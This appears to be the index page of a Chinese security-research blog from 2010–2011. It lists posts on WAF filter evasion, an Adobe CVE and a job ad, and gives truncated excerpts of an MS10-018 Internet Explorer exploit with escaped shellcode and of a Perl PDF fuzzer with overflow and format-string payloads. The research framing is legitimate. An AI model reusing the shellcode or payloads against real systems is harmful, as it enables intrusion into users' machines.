欢迎信息安全界的朋友!黑站、挂马的勿扰!只做基础理论研究。交流IDS、IPS、buffer overflow、内核编程 、sniffer,技术共享!
. . . . .
. . .
'BBNNNN . .
N . . .
N . . .
N. . .
N . . . N . NN
B . NN. NN
NN . . BN NN
N . . . . . ND. NN
N. . .. . NN . NN
N .. . NB NN
N B. . NN. NN
N . NN NB . NN
NNNBNNNN B . N. NN
N . .N NN
. N . N. NN
.N . . . . N . . BN ..
.. .B . . .. . . N NN . .
N NNN. B. . . N NNNNNN NNN
.. N N N N .NNNB NNN.B. BN. NBN B. B.
.B . . N NN . N N . NB NBN .N NN N N .
.NN . N NN . B .B . N N. . B N.BN.
. N N N . NN N ..B. N . N .B NN
N NN NNN N NNN N NB NNNN
. . B. BN NN . NNN NN NNNNNN. .NB N .
N N . . . . NN . N. . N
. N . . . . .B .
. D. . . . . . . N.
N . . ' . . N .
N . . . . . N .
. . . . NN .
. . N .
. . . N .
. . N. ..
. . NN .
. . . NNBNB. '
. . BNBNNNNN .
. . . . . .
. . .
老外绕过WAF过滤的方法,很值得参考
作者:friddy 日期:2011-10-08
##########
Contents
##########
[0x00] - Introduction
[0x01] - Filter Evasion (Mysql)
[0x01a] - Bypass Functions and Keywords Filtering
[0x01b] - Bypass Regular Expression Filtering
[0x02] - Normally Bypassing Techniques
[0x03] - Advanced Bypassing Techniques
[0x03a] - HTTP Parameter Pollution: Split and Join
[0x03b] - HTTP Parameter Contamination
[0x04] - How to protect your website
[0x05] - Conclusion
[0x06] - References
[0x07] - Greetz To
南京铱迅招聘网络安全工程师
作者:friddy 日期:2011-03-28
铱迅“Web应用防火墙”在线演示设备
作者:friddy 日期:2011-01-28
CVE-2010-1297那个Adobe洞的内幕
作者:friddy 日期:2010-06-09
MS IE MS10018 Exploit Published
作者:friddy 日期:2010-04-12
Title : Microsoft Internet Explorer Code Execution Vulnerabilities (MS10-018)
VUPEN ID : VUPEN/ADV-2010-0744
CVE ID : CVE-2010-0267 - CVE-2010-0488 - CVE-2010-0489 - CVE-2010-0490 - CVE-2010-0491 - CVE-2010-0492 - CVE-2010-0494 - CVE-2010-0805 - CVE-2010-0806 - CVE-2010-0807
/*ms10018 Exploit*/
<html><body>
<script>
var cn = new Array();
var shellcode = unescape( '%uf946%u41fd%u9f4f%uf83f%u4a4e%ufc9b%u9b27%u9f42%u48f5%u4e9b%u46fc%u994f%u4f9f%ufc4f%u9892%u46fc%u99f5%u463f%u9293%u4afc%u4043%ud693%u9242%ud64f%u9643%u484f%u9743%u27f8%u27d6%u4347%u2791%uf948%u4a91%u9b9f%u37fc%
PDF File Standard Fuzzer
作者:friddy 日期:2010-03-23
#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# PDF FUZZER -- TAKE IT TO THE HEAD
# :) HAVE FUN :)
use PDF::Create;
use Getopt::Std;
@overflow = ('A' x 8200, 'A' x 11000, 'A' x 110000, 'A' x 550000, 'A' x 1100000, 'A' x 2200000, 'A' x 12000000, "\0x99" x 1200, "//AAAA" x 250, "\\AAAA" x 250);
@fmtstring = ("%n%n%n%n%n", "%p%p%p%p%p", "%s%s%s%s%s", "%d%d%d%d%d", "%x%x%x%x%x",










